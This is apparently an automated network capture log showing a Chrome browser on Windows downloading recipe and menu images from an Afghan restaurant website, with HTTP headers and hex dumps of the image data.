                                                                                                                                                    2024-10-01 04:26:53 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 57 00 00 00 4b 08 06 00 00 00 05 dc 1b 8c 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRWKpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:53 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:53 UTC7021INData Raw: 2b 5d 64 e8 f0 7e 5e 7c 74 27 fb 8b 10 13 70 ce d2 39 4c 9e 33 8f e6 63 27 f2 e6 3b 7f a2 2b 99 26 61 c2 81 17 75 8e ff b2 47 e0 9a 38 87 7f 53 60 f5 87 3b 98 54 0e 4d 11 8d fd 69 49 a5 25 b8 e4 f8 d9 d4 8f 6b 21 97 4a f1 d1 ab 2f e3 b8 0e 87 db 5b 39 62 66 3d bb 3f 78 8a 99 a7 7e 97 bd 3b 3a 78 e2 b1 87 59 b7 6a 1b 47 cd ae e6 cb b7 de c1 51 cd 13 28 b4 1d 24 68 42 32 02 d1 14 cc 9b 36 1d c3 54 ec 5b fd 0c a9 43 1b 69 68 19 87 69 05 30 7d 3e ec 5c 1a e9 4a 90 a5 5d 35 e5 49 04 84 33 d9 2c 43 c9 d1 2f b0 62 85 02 b9 6c 92 58 63 cb fc 78 75 1d ae eb 94 c8 b4 31 0e 57 68 a0 e1 11 50 29 42 3e 28 af 2e a7 62 c2 14 0e 74 1e a2 eb 89 07 99 bb f8 78 16 97 0b b4 b4 a2 37 0f 71 13 86 bc 92 a0 ae 75 f9 66 4e 7a e7 05 ce be e6 6c 6a d7 84 f9 f2 8f 7e 44 4f c7 00 3f
                                                                                                                                                    Data Ascii: +]d~^|t'p9L3c';+&auG8S`;TMiI%k!J/[9bf=?x~;:xYjGQ($hB26T[Cihi0}>\J]5I3,C/blXcxu1WhP)B>(.btx7qufNzlj~DO?


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    107192.168.2.449874162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:53 UTC658OUTGET /assets/imgs/img_recipe_3.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:53 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:53 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 20:58:54 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 77762
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:53 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:53 UTC16384INData Raw: ff d8 ff e1 16 1c 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 04 cb 00 00 01 01 00 03 00 00 00 01 03 b5 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 33 3a 30 39 3a 32 37 20 31 36 3a 35 38 3a 35 31 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: ExifMM*(1"2i$''Adobe Photoshop CC 2015 (Windows)2023:09:27 16:58:51
                                                                                                                                                    2024-10-01 04:26:53 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:53 UTC16384INData Raw: 18 a6 5d c2 6d 62 c8 de d5 29 b5 7b 35 97 2a aa c8 2f fa d3 c4 9e ae b2 1d 2f b7 ef 13 4d a7 ab b4 b9 5a 5d 5f b4 41 38 af ff 00 6d 55 93 39 5c 71 d1 62 95 a3 93 d2 92 b2 6d 2c de ab 5c 7b 07 bf 56 ae 36 5b cd 8e c5 fd 13 6d 3c f0 58 9e 48 93 63 b5 92 58 2e 72 d9 24 89 5e 09 6f b0 a7 6f ff 00 af 63 45 a2 97 68 6d fa 10 98 5c f5 fd 96 ae 3a c5 5b 09 72 25 8a e1 8f 5d 7a 6a e1 ed bb 66 de c3 da d8 42 9d ad 6a e3 eb 04 54 21 71 bc d7 d5 89 64 75 45 d7 7b 45 ea 02 c7 b0 6c 2d 4d 47 67 06 c6 1b 17 63 6c d6 f4 48 a6 d8 8e 74 69 b6 f6 4d b4 9f 54 51 7b c7 b0 1d c6 e0 fe fc e7 ac fb de cb 48 74 fe c3 a8 de c3 f8 ed 9d 90 b0 1d a5 9a 85 a8 e5 bb 7f 70 d8 a3 9c 8e 17 91 fd 4b d7 22 f5 ad 36 e6 d2 2d 8b 32 3c 8c 24 af 1b dd 15 a4 b1 4a a7 e4 cf f4 ad bd de ba a4 70
                                                                                                                                                    Data Ascii: ]mb){5*//MZ]_A8mU9\qbm,\{V6[m<XHcX.r$^oocEhm\:[r%]zjfBjT!qduE{El-MGgclHtiMTQ{HtpK"6-2<$Jp
                                                                                                                                                    2024-10-01 04:26:53 UTC16336INData Raw: 78 ea 23 9f ed 56 e3 71 6c 9f 34 82 b6 c9 38 ea 3a 55 2a 48 2d 71 cf 31 eb 39 d0 55 8d 47 b5 d7 d5 42 d0 3c cd 8b 7a 28 d1 b8 dc 46 95 1f a6 6b 61 6a d0 c2 e2 9b cf 1c 59 9f 9b ec 8a 2a 38 71 39 d1 37 19 54 09 82 71 fa 4d 41 77 04 3d cc 43 15 10 0c 71 5a 53 b7 5d 01 7f be b4 16 3a 4e 3a 41 a8 66 26 7a 4f 45 10 46 a2 30 9a 81 23 a6 86 9f 44 fa f5 52 ba 3e bb d6 c0 57 8e f1 22 75 52 ee 6d 63 bc d8 82 f6 d8 0c 5a d1 fc 4b 7f 53 ed d4 8b cb 8f 4d 1d 17 15 87 18 af c8 bd e5 b9 b6 11 a1 2e 00 fa 23 01 e5 33 2e a4 ed 50 3b 97 37 19 14 22 19 90 14 60 aa b4 03 81 d4 4d 1b 7b 60 16 da fe 25 f6 ec 28 eb f1 35 7f d7 1f f8 34 bb 5f 85 6d 59 91 30 51 6d 49 13 d6 e3 96 85 dd fd d5 da 5b 39 a9 e7 73 f4 07 2d 6d 57 e2 5f 9b dc 1d c8 62 19 0a e9 01 4e 87 67 d3 ef 55 bd de
                                                                                                                                                    Data Ascii: x#Vql48:U*H-q19UGB<z(FkajY*8q97TqMAw=CqZS]:N:Af&zOEF0#DR>W"uRmcZKSM.#3.P;7"`M{`%(54_mY0QmI[9s-mW_bNgU
                                                                                                                                                    2024-10-01 04:26:53 UTC48INData Raw: ab 25 a8 9e 35 cc 01 f5 54 69 5f 46 90 68 2f 97 6c 93 94 a8 9f 45 1b 66 c5 b0 e7 97 b2 04 51 75 54 04 63 c8 20 d7 2b b0 c7 2a c1 dd 47 a6 a5 2f
                                                                                                                                                    Data Ascii: %5Ti_Fh/lEfQuTc +*G/
                                                                                                                                                    2024-10-01 04:26:53 UTC12226INData Raw: b0 d3 1c a4 18 34 d7 9c 5e 37 d4 e1 65 0f 21 f6 b5 f7 3d ca 64 bb 60 8d c8 20 22 ab 93 ab 0e 25 a8 f9 96 ca 6e 09 0a 2d 48 66 33 8e bd 5e c5 6b 28 52 e4 c7 95 a5 4b 65 5e 75 a6 bb 61 4b 68 20 72 92 c0 6b 55 84 a0 57 7f 79 17 a0 92 0c f8 61 d6 85 ef fb 95 c4 42 60 6b 55 26 46 63 f0 ea 7f 3a 6e a3 88 e6 b4 9a 49 3d a4 f6 bd aa b8 fb 7b b6 ed 5d ba 4b 2d 90 a6 da 16 cf cb 4e ea 6b f0 56 97 10 46 04 74 1a 95 38 71 5a d4 b9 f7 97 a2 a4 70 ca a4 e2 6a cf c3 f6 d8 3d d6 87 7c f4 a7 69 ee 37 bb 56 b6 3b 51 a6 c5 94 08 a3 89 e9 76 f7 eb 51 c0 f4 53 05 60 18 8e 52 46 47 d1 43 71 b9 dc 35 db 68 e3 90 18 53 3e cd 07 50 35 5f 60 4b 81 3e c6 75 72 fa 90 34 1f 2d 44 63 cd c5 69 1b 78 a0 b2 18 f3 58 41 ad 57 77 1a 11 8e ae 51 98 ab 96 b6 4e 0d a0 f3 39 18 ec d1 b7 e7 0d
                                                                                                                                                    Data Ascii: 4^7e!=d` "%n-Hf3^k(RKe^uaKh rkUWyaB`kU&Fc:nI={]K-NkVFt8qZpj=|i7V;QvQS`RFGCq5hS>P5_`K>ur4-DcixXAWwQN9


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    108192.168.2.449875162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:53 UTC663OUTGET /assets/imgs/food_menu_vegfood.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:53 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:53 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:52 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 17444
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:53 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:53 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 46 00 00 00 31 08 06 00 00 00 67 09 df fd 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 3b 6a 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDRF1gpHYs;jiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:53 UTC1060INData Raw: 6c 34 e8 db 0b 34 a7 c1 5c a9 40 ce ec 2d 37 61 56 7a 41 b3 4c 90 0a 73 c2 e5 40 ad 51 6d f4 4b ef 71 6e 28 f0 3a 43 bf f0 79 c1 f1 ca c5 c7 5c 30 c2 34 58 8b 5c 6d 3f cc af ad 0d be 90 65 4c 2d 70 27 70 d4 1b d8 61 4d b5 19 78 2b 17 1d 11 94 23 d4 bd 35 d6 56 6b 7f 10 c0 8f fd cd a2 69 a5 08 c7 4c b5 26 78 52 d2 d3 c6 33 5b 24 2d 96 74 56 1a b0 55 6d bf f0 9f 24 1d 0b b4 ca 4b 79 6a 8b 3e 9e 6f 5b 9a b6 29 c1 77 ee 0b 10 77 d1 70 0c b6 65 66 19 7b 4c b7 f0 bd c2 9a 21 15 eb bb 10 18 64 c1 f9 b8 39 6b a8 b5 53 73 1e c7 a8 17 30 01 f8 00 b0 da f2 aa 87 b1 53 ab 6d b1 77 3d a6 ce 76 59 73 b1 b5 d2 09 c7 90 56 03 af 00 eb bd f1 1d c0 10 0b e8 88 30 1b 2c 6c c7 9a 70 0b 0d f4 72 66 6a e0 bb 56 eb e7 b8 ee f3 c0 c7 4c b4 0a a0 c9 e5 56 1f d9 6a c3 85 a2 13 26
                                                                                                                                                    Data Ascii: l44\@-7aVzALs@QmKqn(:Cy\04X\m?eL-p'paMx+#5VkiL&xR3[$-tVUm$Kyj>o[)wwpef{L!d9kSs0Smw=vYsV0,lprfjVLVj&


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    109192.168.2.449876162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:53 UTC658OUTGET /assets/imgs/img_recipe_4.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:54 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:53 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:06:20 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 232926
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:53 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: ff d8 ff e1 1f ec 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 04 b0 00 00 01 01 00 03 00 00 00 01 06 40 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 37 3a 32 37 20 31 34 3a 32 39 3a 34 37 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: ExifMM*@(1"2i$''Adobe Photoshop CC 2015 (Windows)2022:07:27 14:29:47
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: e9 ff 00 62 b7 1a bc bc 82 eb 35 61 b1 c1 cd 63 f9 dd 5d 61 ad db 5b bf 3a af 51 65 51 f5 1e ec 0a ec 15 de d7 fb 4b 9d 27 67 b1 a3 dd b5 8e 77 d1 5d e1 74 ae 43 eb 07 d5 5c ec bc db ba a5 77 31 ee 7c 0f 44 cc c0 02 ba d9 4f e8 fe 93 bf 32 a7 7f db ea 0c b8 60 23 e9 c6 25 fd 5b e1 ff 00 08 fe f2 4f 35 98 02 04 89 b7 8d a5 d6 e0 e4 3b d0 61 66 5d 8e 10 cb a1 f2 ee 59 bf d4 f6 6e 73 3f c2 35 68 d9 87 76 46 16 46 46 33 df 8f 75 80 5c f6 b2 5b 61 d8 f1 93 b4 3b e9 ef a3 e8 d5 52 3f 5c c9 ea 4c ca 6b fa 8e 2d 74 5b 5b 3d 16 fa 74 8d b7 35 bc cd 8f dc cb 3f eb 2a ae 0d 79 34 64 6f c5 6b ec 76 44 5c eb 9d 10 09 ff 00 07 66 d7 7f 3a cf a1 fc 85 9d 94 18 ca ec d4 4d eb fa 5f e0 ff 00 57 85 a4 49 32 24 9b bf b5 07 47 eb b7 e7 3b 27 f6 b5 b8 87 19 ee b1 de 9c b6 bb
                                                                                                                                                    Data Ascii: b5ac]a[:QeQK'gw]tC\w1|DO2`#%[O5;af]Yns?5hvFFF3u\[a;R?\Lk-t[[=t5?*y4dokvD\f:M_WI2$G;'
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 6f 9f d6 df c4 fa 5e ca a9 76 46 cc f7 5d 68 d5 1e f7 0d 19 65 99 b1 2d 97 2d 2b 9a 75 97 6b ed 63 6e 3c b7 ea 71 53 ee 75 af 89 d1 9c 32 a2 06 bd dc 18 ee ba 79 eb ac 6e 31 ac 1b d1 52 75 1f 03 be 2c fb 42 d6 96 7b e1 ed 8d 79 95 0c 64 17 f3 e9 29 b7 b0 b6 28 64 4b 4a e7 3f 5c 91 cb 4b 31 58 af a6 be e3 ce 7a 4a da 6c dd eb b0 0a ee b4 f4 f3 d8 5f ad c9 8f 56 3c 54 b4 b4 b2 65 ca e8 d8 45 96 bc 39 97 a5 9a b5 ec 75 74 d9 db c5 d8 e4 36 2f d0 d1 4e 67 c9 0c 35 5b 38 d7 68 73 5e c6 ae 1e a3 ce 68 d5 7b 21 99 9d bb 47 96 dc 34 5b b9 7d a4 b4 b2 2d 74 73 da 9f 37 5f 79 f2 1b 66 1d 5a 8b ab a7 4b 55 c3 eb 30 56 99 bb 58 db c2 4d 8f 7a 84 f6 db b1 68 d8 d4 6e 59 6c d4 a7 55 1a 37 7a 7e 3d d2 3b e5 e1 65 e5 cd da f4 b3 6f 5e b0 ab d7 f2 73 dd e8 29 5d d1 d3 c0
                                                                                                                                                    Data Ascii: o^vF]he--+ukcn<qSu2yn1Ru,B{yd)(dKJ?\K1XzJl_V<TeE9ut6/Ng5[8hs^h{!G4[}-ts7_yfZKU0VXMzhnYlU7z~=;eo^s)]
                                                                                                                                                    2024-10-01 04:26:54 UTC16336INData Raw: 64 e3 55 b6 d1 3f 65 19 11 1f 6a dd 7d 44 a0 02 0c c8 99 99 fe 51 fd 5d db 7c 75 85 62 df a9 64 ad 01 2a 95 83 75 8c cc d5 9e 2c 8c c0 d2 21 42 90 5e e0 0b 86 69 6e 61 93 07 4a df 1b fd 16 5a 16 31 24 b9 38 d3 1c 56 f7 e5 39 64 64 98 a0 31 73 88 a3 21 e9 06 55 6b eb 0f f6 3c 80 de b1 0d 77 ec 5b 11 af 2a 3c f0 35 93 f6 4a 94 60 e3 ea 10 fa 0f e9 1f 43 36 5d ae b1 7e ea ac 62 17 0a 3d e2 28 cb a8 69 4b 70 ac ab 61 a9 25 0d 78 0d 5c a9 b8 9e 1c 96 f5 39 d3 da be c2 db 95 d5 07 63 41 8f d9 54 07 32 41 c9 25 4c ad f8 4e 65 8d 75 46 4f 75 40 63 a6 22 af e3 82 ec c9 88 d4 73 26 b5 69 59 08 a2 dc 4a c9 72 c8 cb 3d 89 a1 8a 3a dc 22 d8 ad f5 08 7d 07 f0 19 c7 f8 b7 5c a5 48 cc a4 a2 b4 46 65 8a 41 8b 92 59 31 01 2b 3c b6 03 e6 26 3b b3 ce 15 95 c2 e2 c5 cc d4 b8
                                                                                                                                                    Data Ascii: dU?ej}DQ]|ubd*u,!B^inaJZ1$8V9dd1s!Uk<w[*<5J`C6]~b=(iKpa%x\9cAT2A%LNeuFOu@c"s&iYJr=:"}\HFeAY1+<&;
                                                                                                                                                    2024-10-01 04:26:54 UTC48INData Raw: c4 d6 e5 a3 e4 8e 7c 63 6c 66 35 e2 57 70 c8 6e 43 dc 42 d1 ac 8d 66 21 be 35 bf 89 6c 92 60 33 39 98 8a 31 e8 e3 db dc ca ac c3 11 57 16 1c 89
                                                                                                                                                    Data Ascii: |clf5WpnCBf!5l`391W
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 84 66 08 7e 8f b4 fb 82 b8 8c 3d f3 31 99 8c 9f b4 55 98 99 39 4b d9 18 30 61 91 02 f2 8d c8 4c 19 c6 63 1e 83 de 71 02 12 21 68 af 82 e3 30 8f e3 a7 60 a4 7d a4 01 ed 66 99 99 80 ca b6 38 cf d8 52 4d eb 0d c4 c2 d9 84 c7 73 8f 6f 43 07 b1 53 c8 01 88 47 bb 7d b1 ed 51 c3 b3 62 31 f7 2e 4c 1e 84 7a 9f 40 61 84 03 31 09 80 62 01 e9 98 54 b1 d5 a4 81 f6 8d ef 13 20 b3 02 d3 26 64 4c 88 1b 11 dc e2 62 2e 23 30 f4 3f c6 7f 89 8e 41 f4 27 13 3e 95 fb 7d 05 8a 94 3f 98 61 09 cf a8 fa 87 bc 6f 69 c6 30 83 dc fa 99 4d 3c e3 1c 01 f6 18 32 db 71 39 13 16 cc a7 d0 4f a0 18 87 ef eb 9f e3 3f 5e 44 cc 63 31 98 47 a0 8a 20 50 0f ab 2e 61 18 2a c0 4c 02 78 f1 2c 4b 15 f6 9c 84 f6 33 13 18 9f 61 9c 16 b3 94 27 10 fb 81 ed 04 00 98 2b c9 af 59 04 2b 88 49 89 93 2c 3c 41
                                                                                                                                                    Data Ascii: f~=1U9K0aLcq!h0`}f8RMsoCSG}Qb1.Lz@a1bT &dLb.#0?A'>}?aoi0M<2q9O?^Dc1G P.a*Lx,K3a'+Y+I,<A
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 76 3d ad 5d 7a f7 1d 8d fd a3 6a 58 68 6d 2e c1 5e 39 0d 37 76 57 52 8d 1b 4d b4 02 23 ae 61 5c 4e 26 56 09 15 d9 81 4f 64 f5 01 dd 29 9f ee c6 6d ee d0 50 3e 4a 8d 5e 9e ed 7a b5 d8 8e ee a8 cb 37 6b 35 3d 5b 48 eb af b9 e3 a4 5e ed 7f 65 a3 b7 ac 69 d0 d8 d7 17 b2 e8 eb d3 61 c1 b4 09 a8 ed 63 6e 28 6d 8b 19 ab 42 ec 1c 27 09 bb b4 ee 9b 48 69 a3 ab 6f 1d 95 69 bf 5f ad 5f 4c d7 36 f7 56 f4 1b f4 4e 9c b2 d5 ce c7 70 69 14 76 7f b2 fa 77 f2 9a df 99 4e 2a 5f 65 ec 7b 1b 83 59 7b 3c bc b1 88 39 4d 56 6a ec ad 85 89 d8 0b 29 5d 5c 7e c7 61 d7 ff 00 83 a8 d4 b7 56 12 ba d3 7d d7 1a dc 6c b3 69 ac 58 34 ea b4 f7 49 43 5f f1 ce 9d 36 6f df a0 25 94 f6 0e 51 9c 81 a9 b3 62 5b 4f 6f e3 6d 6b 43 a6 d3 9e 17 ec d7 ab 45 b7 3d a3 57 49 f6 26 ed 14 31 b6 fb 35 76
                                                                                                                                                    Data Ascii: v=]zjXhm.^97vWRM#a\N&VOd)mP>J^z7k5=[H^eiacn(mB'Hioi__L6VNpivwN*_e{Y{<9MVj)]\~aV}liX4IC_6o%Qb[OomkCE=WI&15v
